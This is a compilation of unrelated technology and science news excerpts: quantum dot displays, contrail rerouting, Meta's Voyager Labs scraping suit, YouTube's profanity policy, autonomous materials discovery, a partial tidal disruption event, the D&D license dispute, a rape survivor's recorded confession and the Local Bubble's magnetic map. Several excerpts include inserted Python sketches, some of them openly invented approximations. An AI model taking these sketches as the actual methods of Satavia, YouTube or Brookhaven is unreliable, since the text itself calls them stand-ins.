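    return (H * C / ((E_GAP + confinement_ev) * EV)) * 1e9

for radius in (2.0, 2.5, 3.5):  # smaller dot -> bluer emission
    print(radius, "nm radius ->", round(emission_wavelength_nm(radius)), "nm")
```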
[…]
For the last few years, quantum dots have been used by TV manufacturers to boost the brightness and color of LCD TVs. The “Q” in QLED TV stands for “quantum.”
The quantum dots used in display tech up to this point are what’s called “photoluminescent.” They absorb light, then emit light.
[…]
The prototype I saw was completely different. No traditional LEDs and no OLED. Instead of using light to excite quantum dots into emitting light, it uses electricity. Nothing but quantum dots. Electroluminescent, aka direct-view, quantum dots.
[…]
Theoretically, this will mean thinner, more energy-efficient displays. It means displays that can be easier, as in cheaper, to manufacture.
[…]
Nanosys calls this direct-view, electroluminescent quantum dot tech “nanoLED.”
[…]
With what amounts to a simpler display structure, you can incorporate QD-based displays in a wider variety of situations. Or more specifically, on a wider variety of surfaces. Essentially, you can print an entire QD display onto a surface without the heat required by other “printable” tech.
What does this mean? Just about any flat or curved surface could be a screen.
[…]
For instance, you could incorporate a screen onto the windshield of a car for a more elaborate, high-resolution, easy-to-see, heads-up display. Speed and navigation directions for sure, but how about augmented reality for safer nighttime driving with QD-display-enhanced lane markers and street signs?
[…]
AR glasses have been a thing, but they’re bulky, low resolution and, to be perfectly honest, lame. A QD display could be printed on the lenses themselves, requiring less elaborate electronics in the frames.
[…]
I think an obvious early use, despite how annoying it could be, would be bus or subway windows. These will initially be pitched by cities as a way to show people important info, but inevitably they’ll be used for advertising. That’s certainly not a knock against the tech, just how things work in the world.
[…]
Five to 10 years from now, we’ll almost certainly have options for QD displays in our phones, probably in our living rooms, and possibly on our windshields and windows.
Contrails — the wispy ice clouds trailing behind flying jets — “are surprisingly bad for the environment,” reports CNN: A study that looked at aviation’s contribution to climate change between 2000 and 2018 concluded that contrails create 57% of the sector’s warming impact, significantly more than the CO2 emissions from burning fuel. They do so by trapping heat that would otherwise be released into space.
And yet, the problem may have an apparently straightforward solution. Contrails — short for condensation trails, which form when water vapor condenses into ice crystals around the small particles emitted by jet engines — require cold and humid atmospheric conditions, and don’t always stay around for long. Researchers say that by targeting specific flights that have a high chance of producing contrails, and varying their flight path ever so slightly, much of the damage could be prevented.
Adam Durant, a volcanologist and entrepreneur based in the UK, is aiming to do just that. “We could, in theory, solve this problem for aviation within one or two years,” he says…. Of contrails’ climate impact, “80 or 90% is coming from only maybe five to 10% of all flights,” says Durant. “Simply redirecting a small proportion of flights can actually save the majority of the contrail climate impact….”
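The screening step is conceptually simple: from a weather forecast, flag the flight segments that will cross cold, ice-supersaturated air, and nudge only those. A schematic sketch follows (the thresholds are rough stand-ins for the Schmidt-Appleman-style criteria real contrail forecasting uses, not Satavia’s actual model):

```python
def contrail_prone(temp_c, rh_ice_percent):
    """Persistent contrails need very cold air supersaturated with respect to ice."""
    return temp_c <= -40.0 and rh_ice_percent >= 100.0

def segments_to_reroute(flight_path):
    """flight_path: list of (segment_id, temp_c, rh_ice_percent) from a forecast."""
    return [seg for seg, t, rh in flight_path if contrail_prone(t, rh)]

# Only the flagged segments need a small altitude change; the rest fly as planned.
path = [("A", -55.0, 110.0), ("B", -50.0, 60.0), ("C", -38.0, 105.0)]
print(segments_to_reroute(path))  # ['A']
```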
In 2021, scientists calculated that addressing the contrail problem would cost under $1 billion a year, but provide benefits worth more than 1,000 times as much. And a study from Imperial College London showed that diverting just 1.7% of flights could reduce the climate damage of contrails by as much as 59%.
Durant’s company Satavia is now testing its technology with two airlines and “actively looking for more airlines in 2023 to work with, as we start scaling up the service that we offer.”
Truly addressing the issue may require some changes to air traffic rules, Durant says — but he’s not the only one working on the issue. There’s also the task force of a non-profit energy think tank that includes six airlines, plus researchers and academics. “We could seriously reduce, say, 50% of the industry’s contrails impact by 2030,” Durant tells CNN. “That’s totally attainable, because we can do it with software and analytics.”
Meta has filed a lawsuit against Voyager Labs, which it has accused of creating tens of thousands of fake accounts to scrape data from more than 600,000 Facebook users’ profiles. It says the surveillance company pulled information such as posts, likes, friend lists, photos, and comments, along with other details from groups and pages. Meta claims that Voyager masked its activity using its Surveillance Software, and that the company has also scraped data from Instagram, Twitter, YouTube, LinkedIn and Telegram to sell and license for profit.
In the complaint, which was obtained by Gizmodo, Meta has asked a judge to permanently ban Voyager from Facebook and Instagram. “As a direct result of Defendant’s unlawful actions, Meta has suffered and continues to suffer irreparable harm for which there is no adequate remedy at law, and which will continue unless Defendant’s actions are enjoined,” the filing reads. Meta said Voyager’s actions have caused it “to incur damages, including investigative costs, in an amount to be proven at trial.”
Meta claims that Voyager scraped data from accounts belonging to “employees of non-profit organizations, universities, news media organizations, healthcare facilities, the armed forces of the United States, and local, state, and federal government agencies, as well as full-time parents, retirees, and union members.” The company noted in a blog post that it disabled accounts linked to Voyager and that it filed the suit to enforce its terms and policies.
[…]
In 2021, The Guardian reported that the Los Angeles Police Department had tested Voyager’s social media surveillance tools in 2019. The company is said to have told the department that police could use the software to track the accounts of a suspect’s friends on social media, and that the system could predict crimes before they took place by making assumptions about a person’s activity.
According to The Guardian, Voyager has suggested factors like Instagram usernames denoting Arab pride or tweeting about Islam could indicate someone is leaning toward extremism. Other companies, such as Palantir, have worked on predictive policing tech. Critics such as the Electronic Frontier Foundation claim that tech can’t predict crime and that algorithms merely perpetuate existing biases.
Data scraping is an issue that Meta has to take seriously. In 2021, it sued an individual for allegedly scraping data on more than 178 million users. Last November, the Irish Data Protection Commission fined the company €265 million ($277 million) for failing to stop bad actors from obtaining millions of people’s phone numbers and other data, which were published elsewhere online. The regulator said Meta failed to comply with GDPR data protection rules.
YouTube is rethinking its approach to colorful language after an uproar. In a statement to The Verge, the Google brand says it’s “making some adjustments” to a profanity policy it unveiled in November after receiving blowback from creators. The rule limits or removes ads on videos where someone swears within the first 15 seconds or makes “focal usage” of rude words throughout, and it completely demonetizes a clip if swearing either occurs in the first seven seconds or dominates the content.
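As described, the rule reduces to a few timing checks. A rough encoding of the policy as reported (the real classifier surely weighs more signals than this; the function and its parameters are invented for illustration):

```python
def ad_status(first_swear_second=None, usage="none"):
    """Approximate YouTube's November 2022 profanity rules as reported.
    usage: "none", "focal" (rude words throughout), or "dominant" (swearing dominates)."""
    if (first_swear_second is not None and first_swear_second < 7) or usage == "dominant":
        return "demonetized"
    if (first_swear_second is not None and first_swear_second < 15) or usage == "focal":
        return "limited or no ads"
    return "full ads"

print(ad_status(first_swear_second=5))   # demonetized
print(ad_status(first_swear_second=12))  # limited or no ads
```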
While that policy wouldn’t necessarily be an issue by itself, YouTube has been applying the criteria to videos uploaded before the new rule took effect. As Kotaku explains, YouTube has demonetized old videos for channels like RTGame. Producers haven’t had success appealing these decisions, and the company won’t let users edit these videos to pass muster.
Communication has also been a problem. YouTube doesn’t usually tell violators exactly what they did wrong, and creators tend to only learn about the updated policy after the service demonetizes their work. There are also concerns about inconsistency. Some videos are flagged while others aren’t, and a remonetized video might lose that income a day later. Even ProZD’s initial video criticizing the policy, which was designed to honor the rules, lost ad revenue after two days.
Scientists at the U.S. Department of Energy’s (DOE) Brookhaven National Laboratory have successfully demonstrated that autonomous methods can discover new materials. The artificial intelligence (AI)-driven technique led to the discovery of three new nanostructures, including a first-of-its-kind nanoscale “ladder.” The research was published today in Science Advances.
The newly discovered structures were formed by a process called self-assembly, in which a material’s molecules organize themselves into unique patterns. Scientists at Brookhaven’s Center for Functional Nanomaterials (CFN) are experts at directing the self-assembly process, creating templates for materials to form desirable arrangements for applications in microelectronics, catalysis, and more. Their discovery of the nanoscale ladder and other new structures further widens the scope of self-assembly’s applications.
[…]
“gpCAM is a flexible algorithm and software for autonomous experimentation,” said Berkeley Lab scientist and co-author Marcus Noack. “It was used particularly ingeniously in this study to autonomously explore different features of the model.”
[…]
“An old school way of doing material science is to synthesize a sample, measure it, learn from it, and then go back and make a different sample and keep iterating that process,” Yager said. “Instead, we made a sample that has a gradient of every parameter we’re interested in. That single sample is thus a vast collection of many distinct material structures.”
Then, the team brought the sample to NSLS-II, which generates ultrabright X-rays for studying the structure of materials.
[…]
“One of the SMI beamline’s strengths is its ability to focus the X-ray beam on the sample down to microns,” said NSLS-II scientist and co-author Masa Fukuto. “By analyzing how these microbeam X-rays get scattered by the material, we learn about the material’s local structure at the illuminated spot. Measurements at many different spots can then reveal how the local structure varies across the gradient sample. In this work, we let the AI algorithm pick, on the fly, which spot to measure next to maximize the value of each measurement.”
As the sample was measured at the SMI beamline, the algorithm, without human intervention, created a model of the material’s numerous and diverse structures. The model updated itself with each subsequent X-ray measurement, making every measurement more insightful and accurate.
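The loop at work here is the classic active-learning cycle: fit a surrogate model to the measurements taken so far, then measure next wherever the model is least certain. Below is a generic sketch of that cycle using an off-the-shelf Gaussian process (a simplified stand-in for gpCAM’s machinery, not the study’s actual code):

```python
import numpy as np
from sklearn.gaussian_process import GaussianProcessRegressor

def measure(x):
    # Stand-in for one X-ray scattering measurement at position x on the sample.
    return np.sin(3 * x) + 0.1 * np.random.randn()

candidates = np.linspace(0, 1, 200).reshape(-1, 1)  # spots the beamline could probe
X = [[0.0], [1.0]]                                  # seed measurements at the edges
y = [measure(0.0), measure(1.0)]

gp = GaussianProcessRegressor()
for _ in range(20):                                 # the autonomous measurement loop
    gp.fit(X, y)
    _, std = gp.predict(candidates, return_std=True)
    x_next = candidates[np.argmax(std)]             # most uncertain spot = most informative
    X.append(list(x_next))
    y.append(measure(x_next[0]))
```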
The Soft Matter Interfaces (SMI) beamline at the National Synchrotron Light Source II. Credit: Brookhaven National Laboratory
In a matter of hours, the algorithm had identified three key areas in the complex sample for the CFN researchers to study more closely. They used the CFN electron microscopy facility to image those key areas in exquisite detail, uncovering the rails and rungs of a nanoscale ladder, among other novel features.
From start to finish, the experiment ran about six hours. The researchers estimate they would have needed about a month to make this discovery using traditional methods.
“Autonomous methods can tremendously accelerate discovery,” Yager said. “It’s essentially ‘tightening’ the usual discovery loop of science, so that we cycle between hypotheses and measurements more quickly. Beyond just speed, however, autonomous methods increase the scope of what we can study, meaning we can tackle more challenging science problems.”
[…]
“We are now deploying these methods to the broad community of users who come to CFN and NSLS-II to conduct experiments,” Yager said. “Anyone can work with us to accelerate the exploration of their materials research. We foresee this empowering a host of new discoveries in the coming years, including in national priority areas like clean energy and microelectronics.”
Hundreds of millions of light-years away in a distant galaxy, a star orbiting a supermassive black hole is being violently ripped apart under the black hole’s immense gravitational pull. As the star is shredded, its remnants are transformed into a stream of debris that rains back down onto the black hole to form a very hot, very bright disk of material swirling around the black hole, called an accretion disk. This phenomenon—where a star is destroyed by a supermassive black hole and fuels a luminous accretion flare—is known as a tidal disruption event (TDE), and it is predicted that TDEs occur roughly once every 10,000 to 100,000 years in a given galaxy.
[…]
TDEs are usually “once-and-done” because the extreme gravitational field of the SMBH destroys the star, meaning that the SMBH fades back into darkness following the accretion flare. In some instances, however, the high-density core of the star can survive the gravitational interaction with the SMBH, allowing it to orbit the black hole more than once. Researchers call this a repeating partial TDE.
[…]
The findings, published in Astrophysical Journal Letters, describe the capture of the star by an SMBH, the stripping of the material each time the star comes close to the black hole, and the delay between when the material is stripped and when it feeds the black hole again.
[…]
Once bound to the SMBH, the star powering the emission from AT2018fyk has been repeatedly stripped of its outer envelope each time it passes through its point of closest approach with the black hole. The stripped outer layers of the star form the bright accretion disk, which researchers can study using X-ray and ultraviolet/optical telescopes that observe light from distant galaxies.
[…]
“Until now, the assumption has been that when we see the aftermath of a close encounter between a star and a supermassive black hole, the outcome will be fatal for the star, that is, the star is completely destroyed,” he says. “But contrary to all other TDEs we know of, when we pointed our telescopes to the same location again several years later, we found that it had re-brightened again. This led us to propose that rather than being fatal, part of the star survived the initial encounter and returned to the same location to be stripped of material once more, explaining the re-brightening phase.”
[…]
So how could a star survive its brush with death? It all comes down to a matter of proximity and trajectory. If the star collided head-on with the black hole and passed the event horizon—the threshold where the speed needed to escape the black hole surpasses the speed of light—the star would be consumed by the black hole. If the star passed very close to the black hole and crossed the so-called “tidal radius”—where the tidal force of the hole is stronger than the gravitational force that keeps the star together—it would be destroyed. In the model they have proposed, the star’s orbit reaches a point of closest approach that is just outside of the tidal radius, but doesn’t cross it completely: some of the material at the stellar surface is stripped by the black hole, but the material at its center remains intact.
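The geometry can be made concrete with the standard order-of-magnitude formula for the tidal radius, r_t ≈ R★(M_BH/M★)^(1/3), compared against the hole’s Schwarzschild radius. A quick check for a sun-like star and a 10-million-solar-mass black hole (round illustrative numbers, not AT2018fyk’s measured parameters):

```python
G = 6.674e-11      # gravitational constant, m^3 kg^-1 s^-2
C = 2.998e8        # speed of light, m/s
M_SUN = 1.989e30   # kg
R_SUN = 6.957e8    # m

m_bh = 1e7 * M_SUN  # illustrative supermassive black hole

# Tidal radius: where the hole's tides overwhelm the star's self-gravity
r_tidal = R_SUN * (m_bh / M_SUN) ** (1 / 3)
# Schwarzschild radius: the event horizon of a non-spinning black hole
r_horizon = 2 * G * m_bh / C**2

print(f"tidal radius:         {r_tidal:.2e} m")    # ~1.5e11 m, about 1 AU
print(f"Schwarzschild radius: {r_horizon:.2e} m")  # ~3.0e10 m
# r_tidal > r_horizon, so disruption happens outside the horizon; an orbit skimming
# just outside r_tidal strips the star's envelope while sparing its denser core.
```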
[…]
More information: T. Wevers et al, Live to Die Another Day: The Rebrightening of AT 2018fyk as a Repeating Partial Tidal Disruption Event, The Astrophysical Journal Letters (2023). DOI: 10.3847/2041-8213/ac9f36
After a week of silence amid intense backlash, Dungeons & Dragons publisher Wizards of the Coast (WoTC) has finally addressed its community’s concerns about changes to the open gaming license. The open gaming license (OGL) has existed since 2000 and has made it possible for a diverse ecosystem of third-party creators to publish virtual tabletop software, expansion books and more. Many of these creators can make a living thanks to the OGL. But over the last week, a new version of the OGL leaked after WoTC sent it to some top creators. More than 66,000 Dungeons & Dragons fans signed an open letter under the name #OpenDnD ahead of an expected announcement, and waves of users deleted their subscriptions to D&D Beyond, WoTC’s online platform. Now, WoTC admitted that “it’s clear from the reaction that we rolled a 1.” Or, in non-Dungeons and Dragons speak, they screwed up.
“We wanted to ensure that the OGL is for the content creator, the homebrewer, the aspiring designer, our players, and the community — not major corporations to use for their own commercial and promotional purpose,” the company wrote in a statement. But fans have critiqued this language, since WoTC — a subsidiary of Hasbro — is a “major corporation” in itself. Hasbro earned $1.68 billion in revenue during the third quarter of 2022. TechCrunch spoke to content creators who had received the unpublished OGL update from WoTC. The terms of this updated OGL would force any creator making more than $50,000 to report earnings to WoTC. Creators earning over $750,000 in gross revenue would have to pay a 25% royalty. The latter creators are the closest thing that third-party Dungeons & Dragons content has to “major corporations” — but gross revenue is not a reflection of profit, so to refer to these companies in that way is a misnomer.
[…]
The fan community also worried about whether WoTC would be allowed to publish and profit off of third-party work without credit to the original creator. Noah Downs, a partner at Premack Rogers and a Dungeons & Dragons livestreamer, told TechCrunch that there was a clause in the document that granted WoTC a perpetual, royalty-free sublicense to all third-party content created under the OGL.
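To make the gross-revenue-versus-profit distinction concrete, here is a hypothetical worked example. It assumes the 25% royalty applies to qualifying revenue above the $750,000 threshold, which is one reading of the leaked terms; the publisher’s figures are invented for illustration:

```python
# Hypothetical illustration: the publisher's numbers and the exact royalty
# base are assumptions, not confirmed terms from the leaked OGL draft.
gross_revenue = 1_000_000  # assumed annual gross revenue
costs = 800_000            # assumed printing, art, staff, distribution
profit = gross_revenue - costs

threshold = 750_000
royalty = 0.25 * max(0, gross_revenue - threshold)

print(f"profit before royalty:  ${profit:,}")            # $200,000
print(f"royalty owed:           ${royalty:,.0f}")        # $62,500
print(f"royalty as % of profit: {royalty / profit:.0%}") # 31%
```

Under these assumptions, a publisher keeping a 20% margin would hand over about 31% of its actual profit, which is why gross revenue is a poor proxy for whether a creator is a “major corporation.”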
Now, WoTC appears to be walking back both the royalty clause and the perpetual license. “What [the next OGL] will not contain is any royalty structure. It also will not include the license back provision that some people were afraid was a means for us to steal work. That thought never crossed our minds,” WoTC wrote in a statement. “Under any new OGL, you will own the content you create. We won’t.” WoTC claims that it included this language in the leaked version of the OGL to prevent creators from being able to “incorrectly allege” that WoTC stole their work. Throughout its statement, WoTC refers to the document that certain creators received as a draft — however, creators who received the document told TechCrunch that it was sent to them with the intention of getting them to sign off on it.
The backlash against these terms was so severe that other tabletop roleplaying game (TTRPG) publishers took action. Paizo is the publisher of Pathfinder, a popular game covered under WoTC’s original OGL. Paizo’s owner and presidents were leaders at Wizards of the Coast at the time the OGL was originally published in 2000, and wrote in a statement yesterday that the company was prepared to go to court over the idea that WoTC could suddenly revoke the OGL from existing projects. Along with other publishers like Kobold Press, Chaosium and Legendary Games, Paizo announced it would release its own Open RPG Creative License (ORC).
“Ultimately, the collective action of the signatures on the open letter and unsubscribing from D&D Beyond made a difference. We have seen that all they care about is profit, and we are hitting their bottom line,” said Eric Silver, game master of Dungeons & Dragons podcast Join the Party. He told TechCrunch that WoTC’s response on Friday is “just a PR statement.”
“Until we see what they release in clear language, we can’t let our foot off the gas pedal,” Silver said. “The corporate playbook is wait it out until the people get bored; we can’t and we won’t.”
Players heard this message loud and clear, and began flocking to D&D Beyond’s website to cancel their subscriptions and delete their accounts. “DnDBegone” and “StopTheSub” joined OpenDnD as trending topics on Twitter as players disparaged Wizards of the Coast and its parent company Hasbro over the draconian policies. The volume of players on the D&D Beyond website overloaded its servers, causing the Subscription Management page to temporarily crash.
The D&D Beyond page has since been restored, but fans wishing to make their voices heard should expect further outages. Thousands of players and content creators have already pulled their support of Dungeons & Dragons via D&D Beyond. Regardless of whether Wizards of the Coast can revoke the old OGL, it is clear that the ill will it has earned will take a lot of work to undo.
A woman who released audio of her rapist’s confession said she wanted to show how “manipulative” abusers can be.
Ellie Wilson, 25, secretly captured Daniel McFarlane admitting to his crimes by setting her phone to record in her handbag.
McFarlane was found guilty of two rape charges and sentenced to five years in prison in July last year.
Ms Wilson said that despite audio and written confessions being used in court, the verdict was not unanimous.
The attacks took place between December 2017 and February 2018 when McFarlane was a medical student at the University of Glasgow.
Since the conviction, Ms Wilson, who waived her anonymity, has campaigned on behalf of victims.
Earlier this week Ms Wilson, who was a politics student and champion athlete at the university at the time, released audio on Twitter of a conversation with McFarlane covertly captured the year after the attacks.
In the recording she asks him: “Do you not get how awful it makes me feel when you say ‘I haven’t raped you’ when you have?”
McFarlane replies: “Ellie, we have already established that I have. The people that I need to believe me, believe me. I will tell them the truth one day, but not today.”
When asked how he feels about what he has done, he says: “I feel good knowing I am not in prison.”
[Image caption: Ellie was a university athletics champion]
The tweet has been viewed by more than 200,000 people.
Ms Wilson told BBC Scotland’s The Nine she had released the clip because many people wondered what evidence she had to secure a rape conviction.
She said the reaction had been “overwhelmingly positive” although a small minority had been very unkind.
And even with the recording of the confession posted online, some people were still saying “he didn’t do it”, Ms Wilson said.
In addition to the audio confession, Ms Wilson had text messages that pointed to McFarlane’s guilt, yet she said she was still worried the evidence would not be enough to secure a conviction.
“The verdict was not unanimous,” she said.
“You can literally have a written confession, an audio confession and not everyone on the jury is going to believe you. I think that says a lot about society.”
Ms Wilson has previously said the experience she had in court was appalling.
You may not realize it in your day-to-day life, but we are all enveloped by a giant “superbubble” that was blown into space by the explosive deaths of a dozen-odd stars. Known as the Local Bubble, this structure extends for about 1,000 light years around the solar system, and is one of countless similar bubbles in our galaxy that are produced by the fallout of supernovas. Cosmic superbubbles have remained fairly mysterious for decades, but recent astronomical advances have finally exposed key details about their evolution and structure. Just within the past few years, researchers have mapped the geometry of the Local Bubble in three dimensions and demonstrated that its surface is an active site of star birth, because it captures gas and dust as it expands into space.
Now, a team of scientists has added another layer to our evolving picture of the Local Bubble by charting the magnetic field of the structure, which is thought to play a major role in star formation. Astronomers led by Theo O’Neill, who conducted the new research during a summer research program at the Center for Astrophysics at Harvard & Smithsonian (CfA), presented “the first-ever 3D map of a magnetic field over a superbubble” on Wednesday at the American Astronomical Society’s 241st annual meeting in Seattle, Washington. The team also unveiled detailed visualizations of their new map, bringing the Local Bubble into sharper focus.
“We think that the entire interstellar medium is really full of all these bubbles that are driven by various forms of feedback from, especially, really massive stars, where they’re outputting energy in some form or another into the space between the stars,” said O’Neill, who just received an undergraduate degree in astronomy-physics and statistics from the University of Virginia, in a joint call with their mentor Alyssa Goodman, an astronomer at CfA who co-authored the new research.
[…]
“Now that we have this map, there’s a lot of cool science that can be done both by us, but hopefully by other people as well,” O’Neill said. “Since stars are clustered, it’s not as if the Sun is super special, and is in the Local Bubble because we’re just lucky. We know that the interstellar medium is full of bubbles like this, and there’s actually a lot of them nearby our own Local Bubble.”
“One cool next step will be looking at places where the Local Bubble is nearby other feedback bubbles,” they concluded. “What happens when these bubbles interact, and how does that drive star formation in general, and the overall long-term evolution of galactic structures?”